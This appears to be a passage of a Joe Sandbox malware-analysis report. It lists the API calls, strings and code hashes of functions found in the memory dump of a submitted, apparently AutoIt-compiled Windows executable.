Function 003FD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003FD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003FD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003FD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003FD69D

Strings

DllGetClassObject, xrefs: 003FD610
,,C, xrefs: 003FD578

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,C$DllGetClassObject
API String ID: 753597075-424322566
Opcode ID: 2f84ba219c9341007bb723ccaff01f1b53dfb6ad0cfc81f9d75bd02a4d3a6112
Instruction ID: bf11e0849476829a82155095205e959c577a115b52d6b3d234c33e3e824ea75f
Opcode Fuzzy Hash: 2f84ba219c9341007bb723ccaff01f1b53dfb6ad0cfc81f9d75bd02a4d3a6112
Instruction Fuzzy Hash: 414167B1600208DFDB16DF54C988AAABBBAEF44310F5581A9EE09DF205D7B1DD44CBA4

Function 00403671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00403697,?), ref: 0040468B

Part of subcall function 0040466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00403697,?), ref: 004046A4

lstrcmpiW.KERNEL32(?,?), ref: 004036B7
_wcscmp.LIBCMT ref: 004036D3
MoveFileW.KERNEL32(?,?), ref: 004036EB
_wcscat.LIBCMT ref: 00403733
SHFileOperationW.SHELL32(?), ref: 0040379F

Strings

\*.*, xrefs: 0040372D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 63c3544e024f190f137735d1f9122de7619bd93f677682378f26b00bf727e1c8
Instruction ID: 080822d827899b98f0fabd2a412682b0c8e6ec2044fee598c26c3765e4e52b9b
Opcode Fuzzy Hash: 63c3544e024f190f137735d1f9122de7619bd93f677682378f26b00bf727e1c8
Instruction Fuzzy Hash: 124182B1508344AEC762EF64C441ADF7BECAF89340F40083FB495D7291EA39D689875A

Function 00427291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004272AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00427351
IsMenu.USER32(?), ref: 00427369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004273B1
DrawMenuBar.USER32 ref: 004273C4

Strings

0, xrefs: 0042729E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: cb8947ffe2a5eb3fa84452535c09c0c4b200ea07ae5f1aff4a701e8e60bcd2a0
Instruction ID: 66e8adb23d781f675e4a7ae124644bf7cfee89649f4b72e0e015c4c00295259f
Opcode Fuzzy Hash: cb8947ffe2a5eb3fa84452535c09c0c4b200ea07ae5f1aff4a701e8e60bcd2a0
Instruction Fuzzy Hash: 10412675A04219EFDB20DF50E884A9ABBF8FF08310F94842AFD559B350D734AD54DB54

Function 00420FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00420FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00420FFE
FreeLibrary.KERNEL32(00000000), ref: 004210B5

Part of subcall function 00420FA5: RegCloseKey.ADVAPI32(?), ref: 0042101B
Part of subcall function 00420FA5: FreeLibrary.KERNEL32(?), ref: 0042106D
Part of subcall function 00420FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00421090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00421058

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 44a0a2bbbf250795e1a9c2daa7bca862c090eec7b6c48328e5a612adcbd09826
Instruction ID: 39b0797d0f6134092f94d248290a3bd35ab50e2c13544a544af1323acbd90fa0
Opcode Fuzzy Hash: 44a0a2bbbf250795e1a9c2daa7bca862c090eec7b6c48328e5a612adcbd09826
Instruction Fuzzy Hash: 3E310171A01119BFDB259F90EC85EFFB7BCEF18300F80017AE501A2651D6745E8A9AA8

Function 004262CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004262EC
GetWindowLongW.USER32(00DE58E0,000000F0), ref: 0042631F
GetWindowLongW.USER32(00DE58E0,000000F0), ref: 00426354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00426386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004263B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004263C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004263DB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d133cac6fee6bb26680f77c0fdfb2feb904554ee5edf768b63f432d9f3fb5b0e
Instruction ID: 8b1f9594ec106e11faa3e47b182ba2a9dac22dbe326e2bf7c3a66eaffc1ea077
Opcode Fuzzy Hash: d133cac6fee6bb26680f77c0fdfb2feb904554ee5edf768b63f432d9f3fb5b0e
Instruction Fuzzy Hash: 25311130700260AFDB20DF18EC84F5637E1FB4A714F9A01B9F9408F2B2CB75A8558B99

Function 003FDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003FDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003FDB54
SysAllocString.OLEAUT32(00000000), ref: 003FDB57
SysAllocString.OLEAUT32(?), ref: 003FDB75
SysFreeString.OLEAUT32(?), ref: 003FDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 003FDBA3
SysAllocString.OLEAUT32(?), ref: 003FDBB1

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8dfe1db8c74e245e99759dc2014603831fbeba79fed3e62dc8fa7cb5995ce41c
Instruction ID: 4c3033f284e77534276bdf517764dd97b588334cc97d6812e53f3e26b295e9c3
Opcode Fuzzy Hash: 8dfe1db8c74e245e99759dc2014603831fbeba79fed3e62dc8fa7cb5995ce41c
Instruction Fuzzy Hash: BE21923660021DAFDF11EFA8DC88DBB73ADEB09360B828575FA15DB260D6709C458764

Function 00416173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00417D8B: inet_addr.WSOCK32(00000000), ref: 00417DB6

socket.WSOCK32(00000002,00000001,00000006), ref: 004161C6
WSAGetLastError.WSOCK32(00000000), ref: 004161D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0041620E
connect.WSOCK32(00000000,?,00000010), ref: 00416217
WSAGetLastError.WSOCK32 ref: 00416221
closesocket.WSOCK32(00000000), ref: 0041624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00416263

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 26e1b2f1becc8bab8e8c17e643adbd681eb5c93d73cda575d9ea0da099c7328e
Instruction ID: 8577e4020cef1ee5692a8528476817c2d97be3a4a18063c29287ded2e8f4a06b
Opcode Fuzzy Hash: 26e1b2f1becc8bab8e8c17e643adbd681eb5c93d73cda575d9ea0da099c7328e
Instruction Fuzzy Hash: E431B031600108ABDF10AF64CC85BFA77BDEB45710F45406AFD05AB291CB78AC458BA5

Function 003FF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003FF671
__wcsnicmp.LIBCMT ref: 003FF692
__wcsnicmp.LIBCMT ref: 003FF6AC

Strings

#requireadmin, xrefs: 003FF68C
#notrayicon, xrefs: 003FF669
#OnAutoItStartRegister, xrefs: 003FF6A6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: bc9bafac37ad76b7dff9ab0cee353a5893a3281f861be939d7d08ee727fe5371
Instruction ID: 4309039a91aa92be5baaf70b2c206c45971c691b0c75f4cf16b797e59e136009
Opcode Fuzzy Hash: bc9bafac37ad76b7dff9ab0cee353a5893a3281f861be939d7d08ee727fe5371
Instruction Fuzzy Hash: A82134722046156ED223BA34AD03FB7B398EF59380F25403AFE46CB1A1EB90AD45C395

Function 003FDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003FDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003FDC2F
SysAllocString.OLEAUT32(00000000), ref: 003FDC32
SysAllocString.OLEAUT32 ref: 003FDC53
SysFreeString.OLEAUT32 ref: 003FDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 003FDC76
SysAllocString.OLEAUT32(?), ref: 003FDC84

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9b615c71328586ecac6147c4ee7197c3a9b0582398dbbcaf0285f82b4022ed19
Instruction ID: eaa36853075a8861004f9aa804ecd1522b6814cb678df07adf9f8cf1cc7d7f3c
Opcode Fuzzy Hash: 9b615c71328586ecac6147c4ee7197c3a9b0582398dbbcaf0285f82b4022ed19
Instruction Fuzzy Hash: 4D21A435204208AF9B11EFA8DD88DBB77EDEB08360B918135FA04CB260DAB0DC45C764

Function 004275CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003A1D73
Part of subcall function 003A1D35: GetStockObject.GDI32(00000011), ref: 003A1D87
Part of subcall function 003A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003A1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00427632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0042763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0042764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00427659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00427665

Strings

Msctls_Progress32, xrefs: 00427603

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 745207fd01073dc7b67568ebd7de3070b2fca3630859c1f8784001a3c12eeba2
Instruction ID: 0c1601d9f2f69ec772cd263689f52ad392f9299b38daac32f52241e565b96090
Opcode Fuzzy Hash: 745207fd01073dc7b67568ebd7de3070b2fca3630859c1f8784001a3c12eeba2
Instruction Fuzzy Hash: 8F11B6B1210129BFEF118F64DC85EE77F6DEF087A8F114115BA04A6150C7769C21DBA8

Function 003C9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 003C9AE6

Part of subcall function 003C3187: EncodePointer.KERNEL32(00000000), ref: 003C318A
Part of subcall function 003C3187: __initp_misc_winsig.LIBCMT ref: 003C31A5
Part of subcall function 003C3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003C9EA0
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003C9EB4
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003C9EC7
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003C9EDA
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003C9EED
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003C9F00
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003C9F13
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003C9F26
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003C9F39
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003C9F4C
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003C9F5F
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003C9F72
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003C9F85
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003C9F98
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003C9FAB
Part of subcall function 003C3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003C9FBE

__mtinitlocks.LIBCMT ref: 003C9AEB
__mtterm.LIBCMT ref: 003C9AF4

Part of subcall function 003C9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003C9AF9,003C7CD0,0045A0B8,00000014), ref: 003C9C56
Part of subcall function 003C9B5C: _free.LIBCMT ref: 003C9C5D
Part of subcall function 003C9B5C: DeleteCriticalSection.KERNEL32(02F,?,?,003C9AF9,003C7CD0,0045A0B8,00000014), ref: 003C9C7F

__calloc_crt.LIBCMT ref: 003C9B19
__initptd.LIBCMT ref: 003C9B3B
GetCurrentThreadId.KERNEL32 ref: 003C9B42

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 1f290cc1a612d763e1d1ec4dbc7711c75d500bbb4c2b455dd51b00ce46f5829c
Instruction ID: 0f2fac353caa33f56684d11178c43ee105608ddafe7be0164057ecbae8bf9eda
Opcode Fuzzy Hash: 1f290cc1a612d763e1d1ec4dbc7711c75d500bbb4c2b455dd51b00ce46f5829c
Instruction Fuzzy Hash: 73F06D326097116AE6367B75BC0FF8A2690AF02734B234A2FF464DA0D2EE209D4147A4

Function 0042B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042B644
_memset.LIBCMT ref: 0042B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00466F20,00466F64), ref: 0042B682
CloseHandle.KERNEL32 ref: 0042B694

Strings

doF, xrefs: 0042B64D
oF, xrefs: 0042B63E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oF$doF
API String ID: 3277943733-1637105372
Opcode ID: 0a3c75acf38c157c6886bbd8e2369acd3d0200eadd9a3d5e557a5610a43810a9
Instruction ID: d55ab175a08b8cac012bcdd7b116ed9121d1fc9cdec88ffbb7995922a088a0f6
Opcode Fuzzy Hash: 0a3c75acf38c157c6886bbd8e2369acd3d0200eadd9a3d5e557a5610a43810a9
Instruction Fuzzy Hash: BAF082B26403007BE3106761BC1AFBB3A9CEB18395F414031FE09EA192E7B65C0087EE

Function 003C406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003C3F85), ref: 003C4085
GetProcAddress.KERNEL32(00000000), ref: 003C408C
EncodePointer.KERNEL32(00000000), ref: 003C4097
DecodePointer.KERNEL32(003C3F85), ref: 003C40B2

Strings

RoUninitialize, xrefs: 003C4074
combase.dll, xrefs: 003C4080

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 80042c3739a4632559b0b99ef921243c4802fdc0190ed4354d8d66c9d5b1a253
Instruction ID: 7da3012d6980e0d2b1f511edcddf8c8c31a7eea66ff0047fb4d4fbb70cc49f3d
Opcode Fuzzy Hash: 80042c3739a4632559b0b99ef921243c4802fdc0190ed4354d8d66c9d5b1a253
Instruction Fuzzy Hash: 45E09270681240EBEA20AF61ED09B857AB5B709B43F905039F501E10A0DFF64A09CB1E

Function 004064B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0040660B
_memmove.LIBCMT ref: 00406546

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

_memmove.LIBCMT ref: 004065B9
_memmove.LIBCMT ref: 004066A0
_memmove.LIBCMT ref: 004066B9
_memmove.LIBCMT ref: 004066D5

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 779e94cf4b8d06547345095fba82c970154a070643511e3c92d5231586547e00
Instruction ID: 0b23b408bcf40342dde717821a73a6e4bd85ea8c16d0423421f1a236ff5db77b
Opcode Fuzzy Hash: 779e94cf4b8d06547345095fba82c970154a070643511e3c92d5231586547e00
Instruction Fuzzy Hash: 80617D3050065A9BCB06EF60CC81FFF37A9EF05308F05492AF85A6B292DA399D15DB55

Function 004201E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 00420E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0041FDAD,?,?), ref: 00420E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004202BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004202FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00420320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00420349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042038C
RegCloseKey.ADVAPI32(00000000), ref: 00420399

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity
